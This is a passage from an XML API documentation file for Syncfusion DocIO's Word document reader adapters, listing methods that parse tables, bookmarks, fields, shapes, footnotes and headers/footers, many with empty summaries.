        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.ProcessBookmarkAfterParaEnd(Syncfusion.DocIO.ReaderWriter.WordReaderBase)">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.ReadFootnoteMarker(Syncfusion.DocIO.ReaderWriter.WordReaderBase)">
            <summary>
            
            </summary>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.PrepareParagraph(Syncfusion.DocIO.ReaderWriter.WordReaderBase,Syncfusion.DocIO.DLS.DocReaderAdapterBase.PrepareTableInfo@)">
            <summary>
            
            </summary>
            <param name="reader"></param>
            <param name="prepti"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.PrepareTable(Syncfusion.DocIO.ReaderWriter.IWordReaderBase,Syncfusion.DocIO.DLS.DocReaderAdapterBase.PrepareTableInfo@)">
            <summary>
            Reads the table before.
            </summary>
            <param name="reader">The reader.</param>
            <param name="prepti">The prepare table info.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.EnsureLowerTable(System.Int32,Syncfusion.DocIO.ReaderWriter.WordChunkType)">
            <summary>
            Ensures the lower table.
            </summary>
            <param name="level">The level.</param>
            <param name="chunkType">Type of the chunk.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.EnsureUpperTable(System.Int32,Syncfusion.DocIO.ReaderWriter.WordChunkType)">
            <summary>
            Ensures the upper table.
            </summary>
            <param name="level">The level.</param>
            <param name="chunkType">Type of the chunk.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.AppendTableRow">
            <summary>
            Appends the table row.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.AppendTableCell(Syncfusion.DocIO.DLS.DocReaderAdapterBase.PrepareTableInfo@)">
            <summary>
            Appends the table cell.
            </summary>
            <param name="prepti"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.Finalize(Syncfusion.DocIO.ReaderWriter.WordReaderBase)">
            <summary>
            Finalize current part of read process
            </summary>
            <param name="reader">The reader.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.SetPostfixBkmks">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.ProcessBookmarks(Syncfusion.DocIO.ReaderWriter.WordReaderBase)">
            <summary>
            
            </summary>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.IsParagraphBefore(Syncfusion.DocIO.ReaderWriter.WordReaderBase)">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.AppendBookmark(Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkInfo,System.Boolean)">
            <summary>
            Appends bookmark.
            </summary>
            <param name="bookmarkName">Name of the bookmark.</param>
            <param name="isBookmarkStart">if it is a bookmark start, set to <c>true</c>.</param>
            <param name="isCellGroupBkmk">if it is a cell group BKMK, set to <c>true</c>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.ReadText(Syncfusion.DocIO.ReaderWriter.WordReaderBase)">
            <summary>
            Reads the text.
            </summary>
            <param name="reader">The reader.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.Addtext(Syncfusion.DocIO.ReaderWriter.WordReaderBase,System.String,System.Boolean)">
            <summary>
            Add the required text to in its owner paragraph
            </summary>
            <param name="reader">Current word reader</param>
            <param name="text">Text need to be added</param>
            <param name="isFromFootNoteSplittedText">If the text need to be added from foot note splitted text, set to <c>true</c> otherwise<c>false</c></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.AddTextRange(Syncfusion.DocIO.ReaderWriter.WordReaderBase,System.String)">
            <summary>
            Adds the text range.
            </summary>
            <param name="reader">The reader.</param>
            <param name="text">The text.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.ReadParagraphEnd(Syncfusion.DocIO.ReaderWriter.WordReaderBase)">
            <summary>
            Reads the paragraph end.
            </summary>
            <param name="reader">The reader.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.ReadSymbol(Syncfusion.DocIO.ReaderWriter.WordReaderBase)">
            <summary>
            Reads the symbol.
            </summary>
            <param name="reader">The reader.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.ReadCurrentPageNumber(Syncfusion.DocIO.ReaderWriter.WordReaderBase)">
            <summary>
            Reads the current page number.
            </summary>
            <param name="reader">The reader.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.ReadTab(Syncfusion.DocIO.ReaderWriter.WordReaderBase)">
             <summary>
            
             </summary>
             <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.ReadTableCell(Syncfusion.DocIO.ReaderWriter.WordReaderBase)">
            <summary>
            Reads the table cell.
            </summary>
            <param name="reader">The reader.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.ReadTableRow(Syncfusion.DocIO.ReaderWriter.WordReaderBase)">
            <summary>
            Reads the table row.
            </summary>
            <param name="reader">The reader.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.IsSplitTableRows(Syncfusion.DocIO.ReaderWriter.WordReaderBase,Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray,Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray)">
            <summary>
            Determines whether to split adjacent table rows.
            </summary>
            <param name="previousRowSprms">The previous row SPRMS.</param>
            <param name="currentRowSprms">The current row SPRMS.</param>
            <returns>
            	<c>true</c> if split adjacent table rows; otherwise, <c>false</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.CompareArray(System.Byte[],System.Byte[])">
            <summary>
            Compares the array.
            </summary>
            <param name="buffer1">The buffer1.</param>
            <param name="buffer2">The buffer2.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.ReadAnnotation(Syncfusion.DocIO.ReaderWriter.WordReaderBase)">
            <summary>
            Reads the annotation.
            </summary>
            <param name="reader">The reader.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.ReadFootnote(Syncfusion.DocIO.ReaderWriter.WordReaderBase)">
            <summary>
            Reads the footnote.
            </summary>
            <param name="reader">The reader.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.ReadBreak(Syncfusion.DocIO.ReaderWriter.WordReaderBase,Syncfusion.DocIO.DLS.BreakType)">
            <summary>
            Reads the break.
            </summary>
            <param name="reader">The reader.</param>
            <param name="breakType">Type of the break.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.ReadDocumentEnd(Syncfusion.DocIO.ReaderWriter.WordReaderBase)">
            <summary>
            Reads the document end.
            </summary>
            <param name="reader">The reader.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.ReadShape(Syncfusion.DocIO.ReaderWriter.WordReaderBase)">
            <summary>
            Reads the shape.
            </summary>
            <param name="reader">The reader.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.ReadWatermark(Syncfusion.DocIO.ReaderWriter.WordReaderBase)">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.ReadTextBox(Syncfusion.DocIO.ReaderWriter.WordReaderBase,Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FileShapeAddress)">
            <summary>
            Read textbox.
            </summary>
            <param name="reader">The reader.</param>
            <param name="fspa">The File Shape Address.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.ReadPictureShape(Syncfusion.DocIO.ReaderWriter.WordReaderBase,Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ShapeBase,Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer)">
            <summary>
            Reads picture shape.
            </summary>
            <param name="reader"></param>
            <param name="shape"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.UpdateImageCroppingPostion(Syncfusion.DocIO.DLS.WPicture,Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer)">
            <summary>
            Read the image cropping positions
            </summary>
            <param name="picture"></param>
            <param name="ShapeContainer"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.GetPictureCropValue(System.Int32)">
            <summary>
            Get the picture crop values
            </summary>
            <param name="propValue"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.CheckTextEmbed(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ShapeBase,Syncfusion.DocIO.DLS.WPicture)">
            <summary>
            Checks the text embed.
            </summary>
            <param name="shape">The shape.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.ReadAutoShape(Syncfusion.DocIO.ReaderWriter.WordReaderBase)">
            <summary>
            
            </summary>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.IsUnsupportedSpType(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.BaseContainer)">
            <summary>
            
            </summary>
            <param name="baseContainer"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.ReadAutoShapeText(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.BaseContainer,Syncfusion.DocIO.DLS.ShapeObject)">
            <summary>
            
            </summary>
            <param name="shapeContainer"></param>
            <param name="shapeObj"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.ReadAutoShapeTextBox(System.Int32,Syncfusion.DocIO.DLS.ShapeObject)">
            <summary>
            
            </summary>
            <param name="shapeId"></param>
            <param name="shapeObj"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.ReadImage(Syncfusion.DocIO.ReaderWriter.WordReaderBase)">
            <summary>
            Reads inline images.
            </summary>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.PlaceableMetafileHeader(Syncfusion.DocIO.ReaderWriter.Escher.WordImageReader)">
            <summary>
            Adds the Metafile header wherthe image is Wmf image
            </summary>
            <param name="imageReader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.CalculateCheckSum(System.Int16,System.Int16,System.Int16,System.Int16,System.Int16,System.Int16,System.Int16)">
            <summary>
            Calculates the checksum value
            </summary>
            <param name="keyval"></param>
            <param name="Handle"></param>
            <param name="left"></param>
            <param name="top"></param>
            <param name="right"></param>
            <param name="bottom"></param>
            <param name="Inch"></param>
            <param name="reserved"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.AddItem(Syncfusion.DocIO.DLS.ParagraphItem,Syncfusion.DocIO.DLS.IWParagraph)">
            <summary>
            Adds the item.
            </summary>
            <param name="item">The item.</param>
            <param name="para">The para.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.ReadFldBeginMark(Syncfusion.DocIO.ReaderWriter.WordReaderBase)">
            <summary>
            
            </summary>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.InsertFldSeparator(Syncfusion.DocIO.ReaderWriter.WordReaderBase)">
            <summary>
            Reads field separator.
            </summary>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.InsertFldEndMark(Syncfusion.DocIO.ReaderWriter.WordReaderBase)">
            <summary>
            Reads field end.
            </summary>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.ReadFldBeginMark(Syncfusion.DocIO.ReaderWriter.WordReaderBase,Syncfusion.DocIO.ReaderWriter.Biff_Records.FieldDescriptor)">
            <summary>
            Reads the FLD begin mark.
            </summary>
            <param name="reader">The reader.</param>
            <param name="fld">The FLD.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.ParseFieldCode(System.String)">
            <summary>
            Parses the field code.
            </summary>
            <param name="fieldCode">The field code.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.ReadFieldCode(Syncfusion.DocIO.ReaderWriter.WordReaderBase)">
            <summary>
            Reads field code.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.ReadSpecialField(Syncfusion.DocIO.ReaderWriter.WordReaderBase,Syncfusion.DocIO.ReaderWriter.Biff_Records.FieldDescriptor,System.String)">
            <summary>
            Reads the special field.
            </summary>
            <param name="reader">The reader.</param>
            <param name="fld">The FLD.</param>
            <param name="fieldCode">The field code.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.InsertStartField(Syncfusion.DocIO.ReaderWriter.WordReaderBase)">
            <summary>
            Inserts the start field.
            </summary>
            <param name="reader">The reader.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.ReadExpressionField(System.String,Syncfusion.DocIO.ReaderWriter.Biff_Records.FieldDescriptor)">
            <summary>
            Reads expression or formula field
            </summary>
            <param name="fieldCode">The field code.</param>
            <param name="fld">The FLD.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.ReadOleObject(Syncfusion.DocIO.ReaderWriter.WordReaderBase,Syncfusion.DocIO.FieldType)">
            <summary>
            Read
            </summary>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.ReadTOC(Syncfusion.DocIO.ReaderWriter.WordReaderBase)">
            <summary>
            
            </summary>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.GetField(Syncfusion.DocIO.FieldType)">
            <summary>
            Gets the field from its type.
            </summary>
            <param name="fieldType">Type of the field.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.ReadListFormat(Syncfusion.DocIO.ReaderWriter.WordReaderBase,Syncfusion.DocIO.DLS.WListFormat)">
            <summary>
            Reads list format.
            </summary>
            <param name="reader"></param>
            <param name="listFormat"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.AddUsedFonts(Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            </summary>
            <param name="charFormat"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.ReadCharacterFormat(Syncfusion.DocIO.ReaderWriter.WordReaderBase,Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Reads the character format.
            </summary>
            <param name="reader">The reader.</param>
            <param name="charFormat">The character format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.ReadParagraphFormat(Syncfusion.DocIO.ReaderWriter.WordReaderBase,Syncfusion.DocIO.DLS.IWParagraph)">
            <summary>
            Reads the paragraph format.
            </summary>
            <param name="reader">The reader.</param>
            <param name="paragraph">The paragraph.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.UpdateParagraphStyle(Syncfusion.DocIO.DLS.IWParagraph,Syncfusion.DocIO.ReaderWriter.WordReaderBase)">
            <summary>
            Updates the paragraph style.
            </summary>
            <param name="paragraph">The paragraph.</param>
            <param name="reader">The reader.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.ReadTableRowFormat(Syncfusion.DocIO.ReaderWriter.WordReaderBase,Syncfusion.DocIO.DLS.WTable)">
            <summary>
            Reads the table row format.
            </summary>
            <param name="reader">The reader.</param>
            <param name="table">The table.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.ProcessCommText(Syncfusion.DocIO.ReaderWriter.WordReaderBase,Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Processes the commented text.
            </summary>
            <param name="reader">The reader.</param>
            <param name="para">The paragraph.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocReaderAdapterBase.CurrentParagraph">
            <summary>
            Gets the current paragraph.
            </summary>
            <value>The current paragraph.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocReaderAdapterBase.CurrentField">
            <summary>
            Gets current field.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocReaderAdapterBase.ListPictures">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.DocReaderAdapterBase.PrepareTableState">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.DocReaderAdapterBase.PrepareTableInfo">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.PrepareTableInfo.#ctor(Syncfusion.DocIO.ReaderWriter.WordReaderBase,System.Int32)">
            <summary>
            Updates the specified reader.
            </summary>
            <param name="reader">The reader.</param>
            <param name="prevLevel">The prev level.</param>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.DocReaderAdapterBase.ComplexTable">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.ComplexTable.SetNull">
            <summary>
            Sets the null.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.ComplexTable.AppendOneRowToTable">
            <summary>
            Appends the one row to table.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.ComplexTable.CreateOneRowTable(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.Read(Syncfusion.DocIO.ReaderWriter.WordReader,Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Reads the specified reader.
            </summary>
            <param name="reader">The reader.</param>
            <param name="wordDoc">The word doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.ReadStyleSheet(Syncfusion.DocIO.ReaderWriter.WordReader)">
            <summary>
            Reads the style sheet.
            </summary>
            <param name="reader">The reader.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.UpdateStyleNameBasedOnId(Syncfusion.DocIO.ReaderWriter.WordStyle)">
            <summary>
            Get Style name based on Built-in style id
            </summary>
            <param name="wordStyle"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.ReadEscher(Syncfusion.DocIO.ReaderWriter.WordReader)">
            <summary>
            
            </summary>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.ReadBackground">
            <summary>
            Reads the background.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.ReadSubDocument(Syncfusion.DocIO.ReaderWriter.WordReader,Syncfusion.DocIO.ReaderWriter.WordSubdocument)">
            <summary>
            
            </summary>
            <param name="reader"></param>
            <param name="wsType"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.ReadSectionFormat(Syncfusion.DocIO.ReaderWriter.WordReader,Syncfusion.DocIO.DLS.IWSection)">
            <summary>
            Reads the section format.
            </summary>
            <param name="reader">The reader.</param>
            <param name="sec">The sec.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.ReadDocumentProperties(Syncfusion.DocIO.ReaderWriter.WordReader)">
            <summary>
            
            </summary>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.ReadBuiltInDocumentProperties(Syncfusion.DocIO.ReaderWriter.WordReader)">
            <summary>
            Reads Built in Document Properties
            </summary>
            <param name="reader">reader</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.ReadDOP(Syncfusion.DocIO.ReaderWriter.WordReader)">
            <summary>
            Reads DOPDescriptor data.
            </summary>
            <param name="reader">The reader.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.SubDocumentExists(Syncfusion.DocIO.ReaderWriter.WordReader,Syncfusion.DocIO.ReaderWriter.WordSubdocument)">
            <summary>
            Defines if specified subdocument exists in the documnt.
            </summary>
            <param name="reader">The reader.</param>
            <param name="wsType">Type of the ws.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.EndOfTextBody(Syncfusion.DocIO.ReaderWriter.WordReaderBase,Syncfusion.DocIO.ReaderWriter.WordChunkType)">
            <summary>
            Ends the of text body.
            </summary>
            <param name="reader">The reader.</param>
            <param name="chunkType">Type of the chunk.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.ReadAnnotation(Syncfusion.DocIO.ReaderWriter.WordReaderBase)">
            <summary>
            Reads the annotation.
            </summary>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.ReadFootnote(Syncfusion.DocIO.ReaderWriter.WordReaderBase)">
            <summary>
            Reads the footnote.
            </summary>
            <param name="reader">The reader.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.IsMultipleFootNoteEndNoteMarker(System.String@,Syncfusion.DocIO.ReaderWriter.WordReader,Syncfusion.DocIO.DLS.WFootnote,System.Boolean)">
            <summary>
            Determines whether the footnote / endnote marker refers multiple footnotes / end notes
            </summary>
            <param name="footNoteMarker"></param>
            <param name="reader"></param>
            <param name="footnote"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.ReadDocumentEnd(Syncfusion.DocIO.ReaderWriter.WordReaderBase)">
            <summary>
            
            </summary>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.ReadTextBox(Syncfusion.DocIO.ReaderWriter.WordReaderBase,Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FileShapeAddress)">
            <summary>
            Reads shape objects
            </summary>
            <param name="reader">The reader.</param>
            <param name="fspa">The File Shape Address.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.CheckTextEmbed(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ShapeBase,Syncfusion.DocIO.DLS.WPicture)">
            <summary>
            Checks the text embed.
            </summary>
            <param name="shape">The shape.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.ReadAutoShapeTextBox(System.Int32,Syncfusion.DocIO.DLS.ShapeObject)">
            <summary>
            Reads text body for autoshape.
            </summary>
            <param name="shapeId"></param>
            <param name="shapeObj"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.ProcessCommText(Syncfusion.DocIO.ReaderWriter.WordReaderBase,Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Processes the commented text.
            </summary>
            <param name="reader">The reader.</param>
            <param name="para">The paragraph.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.SplitCommText(Syncfusion.DocIO.DLS.WParagraph,System.Int32,System.Int32)">
            <summary>
            Splits the comm text.
            </summary>
            <param name="para">The paragraph.</param>
            <param name="startTextPos">The start text pos.</param>
            <param name="splitPos">The split pos.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.UpdateCommentMarks(Syncfusion.DocIO.DLS.WComment)">
            <summary>
            Updates the comment marks.
            </summary>
            <param name="comment">The comment.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.ParseListPicture">
            <summary>
            Parses the list picture.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.CheckWatermark(Syncfusion.DocIO.DLS.WSection)">
            <summary>
            Checks the watermark.
            </summary>
            <param name="section">The section.</param>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.DocReaderAdapter.SubDocumentAdapter">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.SubDocumentAdapter.ReadSubDocBody(Syncfusion.DocIO.ReaderWriter.WordReader,Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Reads subdocument.
            </summary>
            <param name="reader"></param>
            <param name="documentEx"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.SubDocumentAdapter.Read(Syncfusion.DocIO.ReaderWriter.WordReader)">
            <summary>
            
            </summary>
            <param name="reader"></param>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.DocReaderAdapter.HeaderFooterAdapter">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocReaderAdapter.HeaderFooterAdapter.m_currentHFType">
            <summary>
            Current type of header/footer.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocReaderAdapter.HeaderFooterAdapter.m_itemEnd">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocReaderAdapter.HeaderFooterAdapter.m_hfTxbxAdapter">
            <summary>
            Header/footer textbox adapter
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.HeaderFooterAdapter.Read(Syncfusion.DocIO.ReaderWriter.WordReader)">
            <summary>
            
            </summary>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.HeaderFooterAdapter.SetSeparatorBody(Syncfusion.DocIO.DLS.WTextBody,System.Int32)">
            <summary>
            Sets the separator body.
            </summary>
            <param name="textBody">The text body.</param>
            <param name="index">The index.</param>
            <returns>WTextBody.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.HeaderFooterAdapter.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.HeaderFooterAdapter.EndOfTextBody(Syncfusion.DocIO.ReaderWriter.WordReaderBase,Syncfusion.DocIO.ReaderWriter.WordChunkType)">
            <summary>
            
            </summary>
            <param name="reader"></param>
            <param name="chunkType"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.HeaderFooterAdapter.ReadTextBox(Syncfusion.DocIO.ReaderWriter.WordReaderBase,Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FileShapeAddress)">
            <summary>
            Read textbox.
            </summary>
            <param name="reader">The reader.</param>
            <param name="fspa">The file shape address structure</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.HeaderFooterAdapter.ReadWatermark(Syncfusion.DocIO.ReaderWriter.WordReaderBase)">
            <summary>
            Read
            </summary>
            <param name="reader"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.HeaderFooterAdapter.ReadAutoShapeTextBox(System.Int32,Syncfusion.DocIO.DLS.ShapeObject)">
            <summary>
            Reads text body for autoshape.
            </summary>
            <param name="shapeId"></param>
            <param name="shapeObj"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.HeaderFooterAdapter.CheckTextEmbed(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ShapeBase,Syncfusion.DocIO.DLS.WPicture)">
            <summary>
            Checks the text embed.
            </summary>
            <param name="shape">The shape.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.HeaderFooterAdapter.ReadSubdocument(Syncfusion.DocIO.ReaderWriter.WordReader,Syncfusion.DocIO.ReaderWriter.WordSubdocument)">
            <summary>
            
            </summary>
            <param name="reader"></param>
            <param name="wsType"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.HeaderFooterAdapter.RemoveHFLastParagraphs(Syncfusion.DocIO.DLS.IWSection)">
            <summary>
            Removes the last paragraphs in headers / footers.
            </summary>
            <param name="section">The section.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.HeaderFooterAdapter.RemoveLastParagraph(Syncfusion.DocIO.DLS.WTextBody)">
            <summary>
            Removes Last paragraph in separator stories
            </summary>
            <param name="textBody"></param>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocReaderAdapter.HeaderFooterAdapter.TextBoxAdapter">
            <summary>
            Gets the text box adapter.
            </summary>
            <value>The text box adapter.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.DocReaderAdapter.AnnotationAdapter">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.AnnotationAdapter.Read(Syncfusion.DocIO.ReaderWriter.WordReader)">
            <summary>
            Reads the specified reader.
            </summary>
            <param name="reader">The reader.</param>
        </member>
